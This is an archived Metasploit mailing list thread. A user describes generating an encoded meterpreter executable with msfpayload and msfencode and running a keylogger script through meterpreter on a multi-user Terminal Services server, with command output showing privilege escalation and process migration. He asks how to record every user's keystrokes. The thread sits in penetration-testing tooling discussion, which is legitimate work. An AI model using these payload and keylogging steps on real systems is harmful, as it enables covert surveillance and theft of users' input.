Metasploit mailing list archives

Re: keylogrecorder not working with Terminal Service and Metasploit Portable working incorrectly to generate payloads.


From: Richard Miles <richard.k.miles () googlemail com>
Date: Thu, 2 Dec 2010 18:36:38 -0600

Hi

Nice. Can I have a beta of this smartlocker?

Or can you share some details of how you solved this problem?

In particular, any idea how to deal with the case when explorer.exe is available and
injecting into another process freezes?

Thanks

On Thu, Dec 2, 2010 at 5:47 PM, c0lists <lists () carnal0wnage com> wrote:
Actually mubix and I will be releasing smartlocker shortly, which should
handle some of the issues with multiple winlogon sessions.

Guess this is a good kick in the butt to do that...

-CG

On Thu, Dec 2, 2010 at 6:17 PM, Richard Miles
<richard.k.miles () googlemail com> wrote:
Hi

I ended up unloading my antivirus and was able to execute msfpayload
portable (last release available at the Metasploit website). Most of the
features work very well, but when I try to create a .exe payload it is
created, but not in the correct way. I created it using:

C:\Temp\ruby\bin>ruby.exe ..\..\msf3\msfpayload
windows/meterpreter/bind_tcp LHOST=127.0.0.1 R | ruby.exe
..\..\msf3\msfencode -e x86/shikata_ga_nai -t exe > test.exe

[*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)

The test.exe was created, but when executed it starts and finishes
(crashes?) in the same second. If I generate the same payload from my
Linux box it works very well. So, I believe it may be a bug.

The other thing that caught my attention is keylogrecorder from
Carlos; it doesn't appear to work in a Terminal Services environment with
multiple users. See the output:

meterpreter > run keylogrecorder -c 0
[*]     explorer.exe Process found, migrating into 3247
[*] Migration Successful!!
[*]     explorer.exe Process found, migrating into 3622
[-] Error in script: Rex::RuntimeError Cannot migrate into this
process (insufficient privileges)
meterpreter > getuid
Server username: MyDomain\User01
meterpreter > rev2self
meterpreter > getuid
Server username: MyDomain\User01
meterpreter > drop_token
Relinquished token, now running as: MyDomain\User01
meterpreter > getuid
Server username: MyDomain\User01
meterpreter >

It clearly finds the first exploit and migrates to it, but it continues
in the loop and tries to find the second user to migrate to, and that fails
because the previously migrated process is not administrator. I also
tried to revert my privileges to admin with rev2self or drop_token, but
it doesn't work.

My workaround was to modify the script to look for a specific pid and end
the loop when it is found. But it would be nice to have a patch to fix it
properly. Maybe ask for the name of the user to inject the keylogger into,
or maybe restore the older privileges before migrating to the next one;
maybe this way we could keylog all the sessions at the same
time?

Also, on this server I found a strange situation, where different
sessions do not have an explorer.exe; consequently the script failed. I
found just a few executables in use for these users. I used pslist
and got the main process (using tree view - there are 2 main
processes), and I modified the keylogger to migrate to this process, but
the crazy thing is that it just freezes.


meterpreter > getsystem
...got system (via technique 1).
meterpreter > run keylogrecorder -c 0 -t 15
[*]     spshell.exe Process found, migrating into 1980

And it stays on this screen forever. Depending on the process, it just
gets stuck forever at this stage. With the other one, it also gets stuck
forever at this stage but the main process dies. Has anyone seen
anything like that? Ideas why it happens? How to solve the situation?

I'm unable to record the user activity in this case. Does anyone
have any suggestion?

Thanks
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

